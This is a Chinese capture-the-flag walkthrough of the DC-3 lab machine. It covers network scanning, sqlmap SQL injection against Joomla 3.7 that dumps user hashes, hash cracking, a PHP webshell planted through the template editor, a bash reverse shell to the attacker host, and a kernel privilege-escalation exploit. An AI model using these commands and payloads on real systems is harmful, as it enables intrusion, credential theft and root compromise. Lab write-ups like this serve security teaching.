DC-3实战演练

admin 2024年5月19日02:17:47评论5 views字数 2415阅读8分3秒阅读模式

攻击机:kali 192.168.56.102

靶机:ubantu 192.168.56.101

DC-3不能像DC-1,2一样直接放入VM,我们这里需要用到VirtualBox。先将DC-3的ovf导入到VirtualBox

DC-3实战演练

点开设置-网络

DC-3实战演练

网卡设置为仅主机

DC-3实战演练

再打开VM虚拟机-kali-设置双网卡,一个nat,一个自定义(我这里是VMnet2)

DC-3实战演练

编辑-虚拟网络适配器-更改设置

DC-3实战演练

VMnet更改到桥接-桥接至VirtualBox

这样就可以访问到同一网段了

打开kali机

ifconfig查看自己配置的网卡

DC-3实战演练

可以看到是eth1,0是nat的ip

利用arp-scan扫描

arp-scan -I eth1 l

DC-3实战演练

有两个ip如何判断呢,我们可以都进行一波扫描

nmap -sS 192.168.56.100nmap -sS 192.168.56.101

DC-3实战演练

DC-3实战演练

101这个ip开放了80端口,对他进行一个更详细的扫描

DC-3实战演练

访问该IP端口

DC-3实战演练

扫描网站目录

dirsearch  -u  http://192.168.56.101

扫描结果:

/administrator

DC-3实战演练

/robots.txt.dist

DC-3实战演练

/web.config.txt

DC-3实战演练

/README.txt

DC-3实战演练

等容易泄露的路径,一一查看

根据这些信息,我们可以知道cms是Joomla(nmap也扫出),版本是3.7,以及joomla后台登陆地址

当然我们也可以根据nmap扫描结果后直接利用Joomscan扫描,joomscan可以扫出该网站joomla相关信息

这里我们使用kali自带的searchsploit检索joomla相关漏洞

DC-3实战演练

路径在usr/share/exploitdb/exploits/下面

DC-3实战演练

这里也会有利用方式,直接sqlmap

sqlmap -u "http://192.168.56.101/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent --dbs -p list[fullordering]

DC-3实战演练

sqlmap -u "http://192.168.56.101/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent  -p list[fullordering] -D joomladb --tables

DC-3实战演练

sqlmap -u "http://192.168.56.101/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent  -p list[fullordering] -D joomladb -T "#_users" --columns

由于#号特殊,这里表名是需要加双引号的

sqlmap -u "http://192.168.56.101/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent -D joomladb -T  "#__users" --columns -p list[fullordering]

DC-3实战演练

sqlmap -u "http://192.168.56.101/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent -D joomladb -T  "#__users" -C username,password --dump -p list[fullordering]

DC-3实战演练

放入cmd5查看,可以找到但是付费(没钱)。直接利用john工具爆破hash值

DC-3实战演练

这里因为我之前爆出来过所以开始不显示,用john --show即可

joomla后台账号是admin,所以可以直接登录查看

DC-3实战演练

DC-3实战演练

其实提示也很明显,拿到root权限,而且取决于系统(大概率是系统漏洞),那么面对后台我们首先也需要先拿到web的权限,才能进行root的提权。

后台里寻找文件上传点,或者数据库直接写马(这里不做操作,路径不明且被限制无法上传)

关于文件上传,可以寻找头像sfz等图片上传点,或者文件,模板上传点

DC-3实战演练

DC-3实战演练

DC-3实战演练

DC-3实战演练

可以看到这里是存在上传漏洞的,直接就允许php文件的上传,我们开始上马然后连接

DC-3实战演练

然后发现权限是低权限,先利用工具反弹shell到kali

不知道为啥弹失败了,后面我重新回到模板那里,利用命令

<?phpsystem("bash -c 'bash -i >& /dev/tcp/192.168.56.102/7788 0>&1' ");?>

DC-3实战演练

kali设置好监听 nc -lvvp 7788,然后这边访问该路径下4.php

DC-3实战演练

cat /etc/issue 查看系统版本信息

DC-3实战演练

用searchsploit查找版本漏洞

DC-3实战演练

很多,寻找可利用的,这里很杂乱。可以直接进入官网查看https://www.exploit-db.com/

DC-3实战演练

这里选择用39772.txt

直接下载zip到本地然后上传到蚁剑

DC-3实战演练

unzip 39772.ziplscd 39772  lstar -xvf exploit.tarlscd ebpf_mapfd_doubleput_exploitls./compile.sh./doubleput

DC-3实战演练

利用方法已在文件中指出,解压执行即可

提权成功,输入whoami查看,再进入root目录下查看flag

原文始发于微信公众号(shadowsec):DC-3实战演练

免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2024年5月19日02:17:47
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   DC-3实战演练https://cn-sec.com/archives/2491585.html
                  免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉.

发表评论

匿名网友 填写信息